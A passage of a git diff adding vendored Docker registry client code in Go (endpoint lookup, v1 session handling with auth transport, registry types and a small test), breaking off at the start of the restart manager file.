+func (s *DefaultService) LookupPullEndpoints(hostname string) (endpoints []APIEndpoint, err error) { + s.mu.Lock() + defer s.mu.Unlock() + + return s.lookupEndpoints(hostname) +} + +// LookupPushEndpoints creates a list of endpoints to try to push to, in order of preference. +// It gives preference to v2 endpoints over v1, and HTTPS over plain HTTP. +// Mirrors are not included. +func (s *DefaultService) LookupPushEndpoints(hostname string) (endpoints []APIEndpoint, err error) { + s.mu.Lock() + defer s.mu.Unlock() + + allEndpoints, err := s.lookupEndpoints(hostname) + if err == nil { + for _, endpoint := range allEndpoints { + if !endpoint.Mirror { + endpoints = append(endpoints, endpoint) + } + } + } + return endpoints, err +} + +func (s *DefaultService) lookupEndpoints(hostname string) (endpoints []APIEndpoint, err error) { + endpoints, err = s.lookupV2Endpoints(hostname) + if err != nil { + return nil, err + } + + if s.config.V2Only { + return endpoints, nil + } + + legacyEndpoints, err := s.lookupV1Endpoints(hostname) + if err != nil { + return nil, err + } + endpoints = append(endpoints, legacyEndpoints...) 
+ + return endpoints, nil +} diff --git a/vendor/github.com/docker/docker/registry/service_v1.go b/vendor/github.com/docker/docker/registry/service_v1.go new file mode 100644 index 0000000000..1d251aec6e --- /dev/null +++ b/vendor/github.com/docker/docker/registry/service_v1.go @@ -0,0 +1,40 @@ +package registry + +import "net/url" + +func (s *DefaultService) lookupV1Endpoints(hostname string) (endpoints []APIEndpoint, err error) { + if hostname == DefaultNamespace || hostname == DefaultV2Registry.Host || hostname == IndexHostname { + return []APIEndpoint{}, nil + } + + tlsConfig, err := s.tlsConfig(hostname) + if err != nil { + return nil, err + } + + endpoints = []APIEndpoint{ + { + URL: &url.URL{ + Scheme: "https", + Host: hostname, + }, + Version: APIVersion1, + TrimHostname: true, + TLSConfig: tlsConfig, + }, + } + + if tlsConfig.InsecureSkipVerify { + endpoints = append(endpoints, APIEndpoint{ // or this + URL: &url.URL{ + Scheme: "http", + Host: hostname, + }, + Version: APIVersion1, + TrimHostname: true, + // used to check if supposed to be secure via InsecureSkipVerify + TLSConfig: tlsConfig, + }) + } + return endpoints, nil +} diff --git a/vendor/github.com/docker/docker/registry/service_v1_test.go b/vendor/github.com/docker/docker/registry/service_v1_test.go new file mode 100644 index 0000000000..bd15dfffb8 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/service_v1_test.go @@ -0,0 +1,23 @@ +package registry + +import "testing" + +func TestLookupV1Endpoints(t *testing.T) { + s := NewService(ServiceOptions{}) + + cases := []struct { + hostname string + expectedLen int + }{ + {"example.com", 1}, + {DefaultNamespace, 0}, + {DefaultV2Registry.Host, 0}, + {IndexHostname, 0}, + } + + for _, c := range cases { + if ret, err := s.lookupV1Endpoints(c.hostname); err != nil || len(ret) != c.expectedLen { + t.Errorf("lookupV1Endpoints(`"+c.hostname+"`) returned %+v and %+v", ret, err) + } + } +} diff --git 
a/vendor/github.com/docker/docker/registry/service_v2.go b/vendor/github.com/docker/docker/registry/service_v2.go new file mode 100644 index 0000000000..228d745f8c --- /dev/null +++ b/vendor/github.com/docker/docker/registry/service_v2.go @@ -0,0 +1,78 @@ +package registry + +import ( + "net/url" + "strings" + + "github.com/docker/go-connections/tlsconfig" +) + +func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndpoint, err error) { + tlsConfig := tlsconfig.ServerDefault() + if hostname == DefaultNamespace || hostname == IndexHostname { + // v2 mirrors + for _, mirror := range s.config.Mirrors { + if !strings.HasPrefix(mirror, "http://") && !strings.HasPrefix(mirror, "https://") { + mirror = "https://" + mirror + } + mirrorURL, err := url.Parse(mirror) + if err != nil { + return nil, err + } + mirrorTLSConfig, err := s.tlsConfigForMirror(mirrorURL) + if err != nil { + return nil, err + } + endpoints = append(endpoints, APIEndpoint{ + URL: mirrorURL, + // guess mirrors are v2 + Version: APIVersion2, + Mirror: true, + TrimHostname: true, + TLSConfig: mirrorTLSConfig, + }) + } + // v2 registry + endpoints = append(endpoints, APIEndpoint{ + URL: DefaultV2Registry, + Version: APIVersion2, + Official: true, + TrimHostname: true, + TLSConfig: tlsConfig, + }) + + return endpoints, nil + } + + tlsConfig, err = s.tlsConfig(hostname) + if err != nil { + return nil, err + } + + endpoints = []APIEndpoint{ + { + URL: &url.URL{ + Scheme: "https", + Host: hostname, + }, + Version: APIVersion2, + TrimHostname: true, + TLSConfig: tlsConfig, + }, + } + + if tlsConfig.InsecureSkipVerify { + endpoints = append(endpoints, APIEndpoint{ + URL: &url.URL{ + Scheme: "http", + Host: hostname, + }, + Version: APIVersion2, + TrimHostname: true, + // used to check if supposed to be secure via InsecureSkipVerify + TLSConfig: tlsConfig, + }) + } + + return endpoints, nil +} diff --git a/vendor/github.com/docker/docker/registry/session.go 
b/vendor/github.com/docker/docker/registry/session.go new file mode 100644 index 0000000000..72e286ab44 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/session.go @@ -0,0 +1,783 @@ +package registry + +import ( + "bytes" + "crypto/sha256" + "errors" + "sync" + // this is required for some certificates + _ "crypto/sha512" + "encoding/hex" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/cookiejar" + "net/url" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/api/errcode" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/tarsum" + "github.com/docker/docker/reference" +) + +var ( + // ErrRepoNotFound is returned if the repository didn't exist on the + // remote side + ErrRepoNotFound = errors.New("Repository not found") +) + +// A Session is used to communicate with a V1 registry +type Session struct { + indexEndpoint *V1Endpoint + client *http.Client + // TODO(tiborvass): remove authConfig + authConfig *types.AuthConfig + id string +} + +type authTransport struct { + http.RoundTripper + *types.AuthConfig + + alwaysSetBasicAuth bool + token []string + + mu sync.Mutex // guards modReq + modReq map[*http.Request]*http.Request // original -> modified +} + +// AuthTransport handles the auth layer when communicating with a v1 registry (private or official) +// +// For private v1 registries, set alwaysSetBasicAuth to true. +// +// For the official v1 registry, if there isn't already an Authorization header in the request, +// but there is an X-Docker-Token header set to true, then Basic Auth will be used to set the Authorization header. 
+// After sending the request with the provided base http.RoundTripper, if an X-Docker-Token header, representing +// a token, is present in the response, then it gets cached and sent in the Authorization header of all subsequent +// requests. +// +// If the server sends a token without the client having requested it, it is ignored. +// +// This RoundTripper also has a CancelRequest method important for correct timeout handling. +func AuthTransport(base http.RoundTripper, authConfig *types.AuthConfig, alwaysSetBasicAuth bool) http.RoundTripper { + if base == nil { + base = http.DefaultTransport + } + return &authTransport{ + RoundTripper: base, + AuthConfig: authConfig, + alwaysSetBasicAuth: alwaysSetBasicAuth, + modReq: make(map[*http.Request]*http.Request), + } +} + +// cloneRequest returns a clone of the provided *http.Request. +// The clone is a shallow copy of the struct and its Header map. +func cloneRequest(r *http.Request) *http.Request { + // shallow copy of the struct + r2 := new(http.Request) + *r2 = *r + // deep copy of the Header + r2.Header = make(http.Header, len(r.Header)) + for k, s := range r.Header { + r2.Header[k] = append([]string(nil), s...) + } + + return r2 +} + +// RoundTrip changes an HTTP request's headers to add the necessary +// authentication-related headers +func (tr *authTransport) RoundTrip(orig *http.Request) (*http.Response, error) { + // Authorization should not be set on 302 redirect for untrusted locations. + // This logic mirrors the behavior in addRequiredHeadersToRedirectedRequests. + // As the authorization logic is currently implemented in RoundTrip, + // a 302 redirect is detected by looking at the Referrer header as go http package adds said header. + // This is safe as Docker doesn't set Referrer in other scenarios. 
+ if orig.Header.Get("Referer") != "" && !trustedLocation(orig) { + return tr.RoundTripper.RoundTrip(orig) + } + + req := cloneRequest(orig) + tr.mu.Lock() + tr.modReq[orig] = req + tr.mu.Unlock() + + if tr.alwaysSetBasicAuth { + if tr.AuthConfig == nil { + return nil, errors.New("unexpected error: empty auth config") + } + req.SetBasicAuth(tr.Username, tr.Password) + return tr.RoundTripper.RoundTrip(req) + } + + // Don't override + if req.Header.Get("Authorization") == "" { + if req.Header.Get("X-Docker-Token") == "true" && tr.AuthConfig != nil && len(tr.Username) > 0 { + req.SetBasicAuth(tr.Username, tr.Password) + } else if len(tr.token) > 0 { + req.Header.Set("Authorization", "Token "+strings.Join(tr.token, ",")) + } + } + resp, err := tr.RoundTripper.RoundTrip(req) + if err != nil { + delete(tr.modReq, orig) + return nil, err + } + if len(resp.Header["X-Docker-Token"]) > 0 { + tr.token = resp.Header["X-Docker-Token"] + } + resp.Body = &ioutils.OnEOFReader{ + Rc: resp.Body, + Fn: func() { + tr.mu.Lock() + delete(tr.modReq, orig) + tr.mu.Unlock() + }, + } + return resp, nil +} + +// CancelRequest cancels an in-flight request by closing its connection. +func (tr *authTransport) CancelRequest(req *http.Request) { + type canceler interface { + CancelRequest(*http.Request) + } + if cr, ok := tr.RoundTripper.(canceler); ok { + tr.mu.Lock() + modReq := tr.modReq[req] + delete(tr.modReq, req) + tr.mu.Unlock() + cr.CancelRequest(modReq) + } +} + +func authorizeClient(client *http.Client, authConfig *types.AuthConfig, endpoint *V1Endpoint) error { + var alwaysSetBasicAuth bool + + // If we're working with a standalone private registry over HTTPS, send Basic Auth headers + // alongside all our requests. + if endpoint.String() != IndexServer && endpoint.URL.Scheme == "https" { + info, err := endpoint.Ping() + if err != nil { + return err + } + if info.Standalone && authConfig != nil { + logrus.Debugf("Endpoint %s is eligible for private registry. 
Enabling decorator.", endpoint.String()) + alwaysSetBasicAuth = true + } + } + + // Annotate the transport unconditionally so that v2 can + // properly fallback on v1 when an image is not found. + client.Transport = AuthTransport(client.Transport, authConfig, alwaysSetBasicAuth) + + jar, err := cookiejar.New(nil) + if err != nil { + return errors.New("cookiejar.New is not supposed to return an error") + } + client.Jar = jar + + return nil +} + +func newSession(client *http.Client, authConfig *types.AuthConfig, endpoint *V1Endpoint) *Session { + return &Session{ + authConfig: authConfig, + client: client, + indexEndpoint: endpoint, + id: stringid.GenerateRandomID(), + } +} + +// NewSession creates a new session +// TODO(tiborvass): remove authConfig param once registry client v2 is vendored +func NewSession(client *http.Client, authConfig *types.AuthConfig, endpoint *V1Endpoint) (*Session, error) { + if err := authorizeClient(client, authConfig, endpoint); err != nil { + return nil, err + } + + return newSession(client, authConfig, endpoint), nil +} + +// ID returns this registry session's ID. +func (r *Session) ID() string { + return r.id +} + +// GetRemoteHistory retrieves the history of a given image from the registry. +// It returns a list of the parent's JSON files (including the requested image). 
+func (r *Session) GetRemoteHistory(imgID, registry string) ([]string, error) { + res, err := r.client.Get(registry + "images/" + imgID + "/ancestry") + if err != nil { + return nil, err + } + defer res.Body.Close() + if res.StatusCode != 200 { + if res.StatusCode == 401 { + return nil, errcode.ErrorCodeUnauthorized.WithArgs() + } + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Server error: %d trying to fetch remote history for %s", res.StatusCode, imgID), res) + } + + var history []string + if err := json.NewDecoder(res.Body).Decode(&history); err != nil { + return nil, fmt.Errorf("Error while reading the http response: %v", err) + } + + logrus.Debugf("Ancestry: %v", history) + return history, nil +} + +// LookupRemoteImage checks if an image exists in the registry +func (r *Session) LookupRemoteImage(imgID, registry string) error { + res, err := r.client.Get(registry + "images/" + imgID + "/json") + if err != nil { + return err + } + res.Body.Close() + if res.StatusCode != 200 { + return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) + } + return nil +} + +// GetRemoteImageJSON retrieves an image's JSON metadata from the registry. 
+func (r *Session) GetRemoteImageJSON(imgID, registry string) ([]byte, int64, error) { + res, err := r.client.Get(registry + "images/" + imgID + "/json") + if err != nil { + return nil, -1, fmt.Errorf("Failed to download json: %s", err) + } + defer res.Body.Close() + if res.StatusCode != 200 { + return nil, -1, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) + } + // if the size header is not present, then set it to '-1' + imageSize := int64(-1) + if hdr := res.Header.Get("X-Docker-Size"); hdr != "" { + imageSize, err = strconv.ParseInt(hdr, 10, 64) + if err != nil { + return nil, -1, err + } + } + + jsonString, err := ioutil.ReadAll(res.Body) + if err != nil { + return nil, -1, fmt.Errorf("Failed to parse downloaded json: %v (%s)", err, jsonString) + } + return jsonString, imageSize, nil +} + +// GetRemoteImageLayer retrieves an image layer from the registry +func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io.ReadCloser, error) { + var ( + statusCode = 0 + res *http.Response + err error + imageURL = fmt.Sprintf("%simages/%s/layer", registry, imgID) + ) + + req, err := http.NewRequest("GET", imageURL, nil) + if err != nil { + return nil, fmt.Errorf("Error while getting from the server: %v", err) + } + statusCode = 0 + res, err = r.client.Do(req) + if err != nil { + logrus.Debugf("Error contacting registry %s: %v", registry, err) + // the only case err != nil && res != nil is https://golang.org/src/net/http/client.go#L515 + if res != nil { + if res.Body != nil { + res.Body.Close() + } + statusCode = res.StatusCode + } + return nil, fmt.Errorf("Server error: Status %d while fetching image layer (%s)", + statusCode, imgID) + } + + if res.StatusCode != 200 { + res.Body.Close() + return nil, fmt.Errorf("Server error: Status %d while fetching image layer (%s)", + res.StatusCode, imgID) + } + + if res.Header.Get("Accept-Ranges") == "bytes" && imgSize > 0 { + logrus.Debug("server supports resume") + return 
httputils.ResumableRequestReaderWithInitialResponse(r.client, req, 5, imgSize, res), nil + } + logrus.Debug("server doesn't support resume") + return res.Body, nil +} + +// GetRemoteTag retrieves the tag named in the askedTag argument from the given +// repository. It queries each of the registries supplied in the registries +// argument, and returns data from the first one that answers the query +// successfully. +func (r *Session) GetRemoteTag(registries []string, repositoryRef reference.Named, askedTag string) (string, error) { + repository := repositoryRef.RemoteName() + + if strings.Count(repository, "/") == 0 { + // This will be removed once the registry supports auto-resolution on + // the "library" namespace + repository = "library/" + repository + } + for _, host := range registries { + endpoint := fmt.Sprintf("%srepositories/%s/tags/%s", host, repository, askedTag) + res, err := r.client.Get(endpoint) + if err != nil { + return "", err + } + + logrus.Debugf("Got status code %d from %s", res.StatusCode, endpoint) + defer res.Body.Close() + + if res.StatusCode == 404 { + return "", ErrRepoNotFound + } + if res.StatusCode != 200 { + continue + } + + var tagID string + if err := json.NewDecoder(res.Body).Decode(&tagID); err != nil { + return "", err + } + return tagID, nil + } + return "", fmt.Errorf("Could not reach any registry endpoint") +} + +// GetRemoteTags retrieves all tags from the given repository. It queries each +// of the registries supplied in the registries argument, and returns data from +// the first one that answers the query successfully. It returns a map with +// tag names as the keys and image IDs as the values. 
+func (r *Session) GetRemoteTags(registries []string, repositoryRef reference.Named) (map[string]string, error) { + repository := repositoryRef.RemoteName() + + if strings.Count(repository, "/") == 0 { + // This will be removed once the registry supports auto-resolution on + // the "library" namespace + repository = "library/" + repository + } + for _, host := range registries { + endpoint := fmt.Sprintf("%srepositories/%s/tags", host, repository) + res, err := r.client.Get(endpoint) + if err != nil { + return nil, err + } + + logrus.Debugf("Got status code %d from %s", res.StatusCode, endpoint) + defer res.Body.Close() + + if res.StatusCode == 404 { + return nil, ErrRepoNotFound + } + if res.StatusCode != 200 { + continue + } + + result := make(map[string]string) + if err := json.NewDecoder(res.Body).Decode(&result); err != nil { + return nil, err + } + return result, nil + } + return nil, fmt.Errorf("Could not reach any registry endpoint") +} + +func buildEndpointsList(headers []string, indexEp string) ([]string, error) { + var endpoints []string + parsedURL, err := url.Parse(indexEp) + if err != nil { + return nil, err + } + var urlScheme = parsedURL.Scheme + // The registry's URL scheme has to match the Index' + for _, ep := range headers { + epList := strings.Split(ep, ",") + for _, epListElement := range epList { + endpoints = append( + endpoints, + fmt.Sprintf("%s://%s/v1/", urlScheme, strings.TrimSpace(epListElement))) + } + } + return endpoints, nil +} + +// GetRepositoryData returns lists of images and endpoints for the repository +func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, error) { + repositoryTarget := fmt.Sprintf("%srepositories/%s/images", r.indexEndpoint.String(), name.RemoteName()) + + logrus.Debugf("[registry] Calling GET %s", repositoryTarget) + + req, err := http.NewRequest("GET", repositoryTarget, nil) + if err != nil { + return nil, err + } + // this will set basic auth in r.client.Transport and send cached 
X-Docker-Token headers for all subsequent requests + req.Header.Set("X-Docker-Token", "true") + res, err := r.client.Do(req) + if err != nil { + // check if the error is because of i/o timeout + // and return a non-obtuse error message for users + // "Get https://index.docker.io/v1/repositories/library/busybox/images: i/o timeout" + // was a top search on the docker user forum + if isTimeout(err) { + return nil, fmt.Errorf("Network timed out while trying to connect to %s. You may want to check your internet connection or if you are behind a proxy.", repositoryTarget) + } + return nil, fmt.Errorf("Error while pulling image: %v", err) + } + defer res.Body.Close() + if res.StatusCode == 401 { + return nil, errcode.ErrorCodeUnauthorized.WithArgs() + } + // TODO: Right now we're ignoring checksums in the response body. + // In the future, we need to use them to check image validity. + if res.StatusCode == 404 { + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code: %d", res.StatusCode), res) + } else if res.StatusCode != 200 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + logrus.Debugf("Error reading response body: %s", err) + } + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to pull repository %s: %q", res.StatusCode, name.RemoteName(), errBody), res) + } + + var endpoints []string + if res.Header.Get("X-Docker-Endpoints") != "" { + endpoints, err = buildEndpointsList(res.Header["X-Docker-Endpoints"], r.indexEndpoint.String()) + if err != nil { + return nil, err + } + } else { + // Assume the endpoint is on the same host + endpoints = append(endpoints, fmt.Sprintf("%s://%s/v1/", r.indexEndpoint.URL.Scheme, req.URL.Host)) + } + + remoteChecksums := []*ImgData{} + if err := json.NewDecoder(res.Body).Decode(&remoteChecksums); err != nil { + return nil, err + } + + // Forge a better object from the retrieved data + imgsData := make(map[string]*ImgData, len(remoteChecksums)) + for _, elem := range 
remoteChecksums { + imgsData[elem.ID] = elem + } + + return &RepositoryData{ + ImgList: imgsData, + Endpoints: endpoints, + }, nil +} + +// PushImageChecksumRegistry uploads checksums for an image +func (r *Session) PushImageChecksumRegistry(imgData *ImgData, registry string) error { + u := registry + "images/" + imgData.ID + "/checksum" + + logrus.Debugf("[registry] Calling PUT %s", u) + + req, err := http.NewRequest("PUT", u, nil) + if err != nil { + return err + } + req.Header.Set("X-Docker-Checksum", imgData.Checksum) + req.Header.Set("X-Docker-Checksum-Payload", imgData.ChecksumPayload) + + res, err := r.client.Do(req) + if err != nil { + return fmt.Errorf("Failed to upload metadata: %v", err) + } + defer res.Body.Close() + if len(res.Cookies()) > 0 { + r.client.Jar.SetCookies(req.URL, res.Cookies()) + } + if res.StatusCode != 200 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + return fmt.Errorf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err) + } + var jsonBody map[string]string + if err := json.Unmarshal(errBody, &jsonBody); err != nil { + errBody = []byte(err.Error()) + } else if jsonBody["error"] == "Image already exists" { + return ErrAlreadyExists + } + return fmt.Errorf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody) + } + return nil +} + +// PushImageJSONRegistry pushes JSON metadata for a local image to the registry +func (r *Session) PushImageJSONRegistry(imgData *ImgData, jsonRaw []byte, registry string) error { + + u := registry + "images/" + imgData.ID + "/json" + + logrus.Debugf("[registry] Calling PUT %s", u) + + req, err := http.NewRequest("PUT", u, bytes.NewReader(jsonRaw)) + if err != nil { + return err + } + req.Header.Add("Content-type", "application/json") + + res, err := r.client.Do(req) + if err != nil { + return fmt.Errorf("Failed to upload metadata: %s", err) + } + defer res.Body.Close() + if res.StatusCode == 401 && 
strings.HasPrefix(registry, "http://") { + return httputils.NewHTTPRequestError("HTTP code 401, Docker will not send auth headers over HTTP.", res) + } + if res.StatusCode != 200 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res) + } + var jsonBody map[string]string + if err := json.Unmarshal(errBody, &jsonBody); err != nil { + errBody = []byte(err.Error()) + } else if jsonBody["error"] == "Image already exists" { + return ErrAlreadyExists + } + return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody), res) + } + return nil +} + +// PushImageLayerRegistry sends the checksum of an image layer to the registry +func (r *Session) PushImageLayerRegistry(imgID string, layer io.Reader, registry string, jsonRaw []byte) (checksum string, checksumPayload string, err error) { + u := registry + "images/" + imgID + "/layer" + + logrus.Debugf("[registry] Calling PUT %s", u) + + tarsumLayer, err := tarsum.NewTarSum(layer, false, tarsum.Version0) + if err != nil { + return "", "", err + } + h := sha256.New() + h.Write(jsonRaw) + h.Write([]byte{'\n'}) + checksumLayer := io.TeeReader(tarsumLayer, h) + + req, err := http.NewRequest("PUT", u, checksumLayer) + if err != nil { + return "", "", err + } + req.Header.Add("Content-Type", "application/octet-stream") + req.ContentLength = -1 + req.TransferEncoding = []string{"chunked"} + res, err := r.client.Do(req) + if err != nil { + return "", "", fmt.Errorf("Failed to upload layer: %v", err) + } + if rc, ok := layer.(io.Closer); ok { + if err := rc.Close(); err != nil { + return "", "", err + } + } + defer res.Body.Close() + + if res.StatusCode != 200 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading 
metadata and error when trying to parse response body: %s", res.StatusCode, err), res) + } + return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("Received HTTP code %d while uploading layer: %q", res.StatusCode, errBody), res) + } + + checksumPayload = "sha256:" + hex.EncodeToString(h.Sum(nil)) + return tarsumLayer.Sum(jsonRaw), checksumPayload, nil +} + +// PushRegistryTag pushes a tag on the registry. +// Remote has the format '/ +func (r *Session) PushRegistryTag(remote reference.Named, revision, tag, registry string) error { + // "jsonify" the string + revision = "\"" + revision + "\"" + path := fmt.Sprintf("repositories/%s/tags/%s", remote.RemoteName(), tag) + + req, err := http.NewRequest("PUT", registry+path, strings.NewReader(revision)) + if err != nil { + return err + } + req.Header.Add("Content-type", "application/json") + req.ContentLength = int64(len(revision)) + res, err := r.client.Do(req) + if err != nil { + return err + } + res.Body.Close() + if res.StatusCode != 200 && res.StatusCode != 201 { + return httputils.NewHTTPRequestError(fmt.Sprintf("Internal server error: %d trying to push tag %s on %s", res.StatusCode, tag, remote.RemoteName()), res) + } + return nil +} + +// PushImageJSONIndex uploads an image list to the repository +func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData, validate bool, regs []string) (*RepositoryData, error) { + cleanImgList := []*ImgData{} + if validate { + for _, elem := range imgList { + if elem.Checksum != "" { + cleanImgList = append(cleanImgList, elem) + } + } + } else { + cleanImgList = imgList + } + + imgListJSON, err := json.Marshal(cleanImgList) + if err != nil { + return nil, err + } + var suffix string + if validate { + suffix = "images" + } + u := fmt.Sprintf("%srepositories/%s/%s", r.indexEndpoint.String(), remote.RemoteName(), suffix) + logrus.Debugf("[registry] PUT %s", u) + logrus.Debugf("Image list pushed to index:\n%s", imgListJSON) + headers := map[string][]string{ + 
"Content-type": {"application/json"}, + // this will set basic auth in r.client.Transport and send cached X-Docker-Token headers for all subsequent requests + "X-Docker-Token": {"true"}, + } + if validate { + headers["X-Docker-Endpoints"] = regs + } + + // Redirect if necessary + var res *http.Response + for { + if res, err = r.putImageRequest(u, headers, imgListJSON); err != nil { + return nil, err + } + if !shouldRedirect(res) { + break + } + res.Body.Close() + u = res.Header.Get("Location") + logrus.Debugf("Redirected to %s", u) + } + defer res.Body.Close() + + if res.StatusCode == 401 { + return nil, errcode.ErrorCodeUnauthorized.WithArgs() + } + + var tokens, endpoints []string + if !validate { + if res.StatusCode != 200 && res.StatusCode != 201 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + logrus.Debugf("Error reading response body: %s", err) + } + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push repository %s: %q", res.StatusCode, remote.RemoteName(), errBody), res) + } + tokens = res.Header["X-Docker-Token"] + logrus.Debugf("Auth token: %v", tokens) + + if res.Header.Get("X-Docker-Endpoints") == "" { + return nil, fmt.Errorf("Index response didn't contain any endpoints") + } + endpoints, err = buildEndpointsList(res.Header["X-Docker-Endpoints"], r.indexEndpoint.String()) + if err != nil { + return nil, err + } + } else { + if res.StatusCode != 204 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + logrus.Debugf("Error reading response body: %s", err) + } + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push checksums %s: %q", res.StatusCode, remote.RemoteName(), errBody), res) + } + } + + return &RepositoryData{ + Endpoints: endpoints, + }, nil +} + +func (r *Session) putImageRequest(u string, headers map[string][]string, body []byte) (*http.Response, error) { + req, err := http.NewRequest("PUT", u, bytes.NewReader(body)) + if err != nil { + return nil, 
err + } + req.ContentLength = int64(len(body)) + for k, v := range headers { + req.Header[k] = v + } + response, err := r.client.Do(req) + if err != nil { + return nil, err + } + return response, nil +} + +func shouldRedirect(response *http.Response) bool { + return response.StatusCode >= 300 && response.StatusCode < 400 +} + +// SearchRepositories performs a search against the remote repository +func (r *Session) SearchRepositories(term string, limit int) (*registrytypes.SearchResults, error) { + if limit < 1 || limit > 100 { + return nil, fmt.Errorf("Limit %d is outside the range of [1, 100]", limit) + } + logrus.Debugf("Index server: %s", r.indexEndpoint) + u := r.indexEndpoint.String() + "search?q=" + url.QueryEscape(term) + "&n=" + url.QueryEscape(fmt.Sprintf("%d", limit)) + + req, err := http.NewRequest("GET", u, nil) + if err != nil { + return nil, fmt.Errorf("Error while getting from the server: %v", err) + } + // Have the AuthTransport send authentication, when logged in. + req.Header.Set("X-Docker-Token", "true") + res, err := r.client.Do(req) + if err != nil { + return nil, err + } + defer res.Body.Close() + if res.StatusCode != 200 { + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Unexpected status code %d", res.StatusCode), res) + } + result := new(registrytypes.SearchResults) + return result, json.NewDecoder(res.Body).Decode(result) +} + +// GetAuthConfig returns the authentication settings for a session +// TODO(tiborvass): remove this once registry client v2 is vendored +func (r *Session) GetAuthConfig(withPasswd bool) *types.AuthConfig { + password := "" + if withPasswd { + password = r.authConfig.Password + } + return &types.AuthConfig{ + Username: r.authConfig.Username, + Password: password, + } +} + +func isTimeout(err error) bool { + type timeout interface { + Timeout() bool + } + e := err + switch urlErr := err.(type) { + case *url.Error: + e = urlErr.Err + } + t, ok := e.(timeout) + return ok && t.Timeout() +} diff --git 
a/vendor/github.com/docker/docker/registry/types.go b/vendor/github.com/docker/docker/registry/types.go new file mode 100644 index 0000000000..49c123a3e2 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/types.go @@ -0,0 +1,73 @@ +package registry + +import ( + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/reference" +) + +// RepositoryData tracks the image list, list of endpoints, and list of tokens +// for a repository +type RepositoryData struct { + // ImgList is a list of images in the repository + ImgList map[string]*ImgData + // Endpoints is a list of endpoints returned in X-Docker-Endpoints + Endpoints []string + // Tokens is currently unused (remove it?) + Tokens []string +} + +// ImgData is used to transfer image checksums to and from the registry +type ImgData struct { + // ID is an opaque string that identifies the image + ID string `json:"id"` + Checksum string `json:"checksum,omitempty"` + ChecksumPayload string `json:"-"` + Tag string `json:",omitempty"` +} + +// PingResult contains the information returned when pinging a registry. It +// indicates the registry's version and whether the registry claims to be a +// standalone registry. +type PingResult struct { + // Version is the registry version supplied by the registry in an HTTP + // header + Version string `json:"version"` + // Standalone is set to true if the registry indicates it is a + // standalone registry in the X-Docker-Registry-Standalone + // header + Standalone bool `json:"standalone"` +} + +// APIVersion is an integral representation of an API version (presently +// either 1 or 2) +type APIVersion int + +func (av APIVersion) String() string { + return apiVersions[av] +} + +// API Version identifiers. 
+const ( + _ = iota + APIVersion1 APIVersion = iota + APIVersion2 +) + +var apiVersions = map[APIVersion]string{ + APIVersion1: "v1", + APIVersion2: "v2", +} + +// RepositoryInfo describes a repository +type RepositoryInfo struct { + reference.Named + // Index points to registry information + Index *registrytypes.IndexInfo + // Official indicates whether the repository is considered official. + // If the registry is official, and the normalized name does not + // contain a '/' (e.g. "foo"), then it is considered an official repo. + Official bool + // Class represents the class of the repository, such as "plugin" + // or "image". + Class string +} diff --git a/vendor/github.com/docker/docker/restartmanager/restartmanager.go b/vendor/github.com/docker/docker/restartmanager/restartmanager.go new file mode 100644 index 0000000000..570fc93802 --- /dev/null +++ b/vendor/github.com/docker/docker/restartmanager/restartmanager.go @@ -0,0 +1,128 @@ +package restartmanager + +import ( + "errors" + "fmt" + "sync" + "time" + + "github.com/docker/docker/api/types/container" +) + +const ( + backoffMultiplier = 2 + defaultTimeout = 100 * time.Millisecond +) + +// ErrRestartCanceled is returned when the restart manager has been +// canceled and will no longer restart the container. +var ErrRestartCanceled = errors.New("restart canceled") + +// RestartManager defines object that controls container restarting rules. +type RestartManager interface { + Cancel() error + ShouldRestart(exitCode uint32, hasBeenManuallyStopped bool, executionDuration time.Duration) (bool, chan error, error) +} + +type restartManager struct { + sync.Mutex + sync.Once + policy container.RestartPolicy + restartCount int + timeout time.Duration + active bool + cancel chan struct{} + canceled bool +} + +// New returns a new restartmanager based on a policy. 
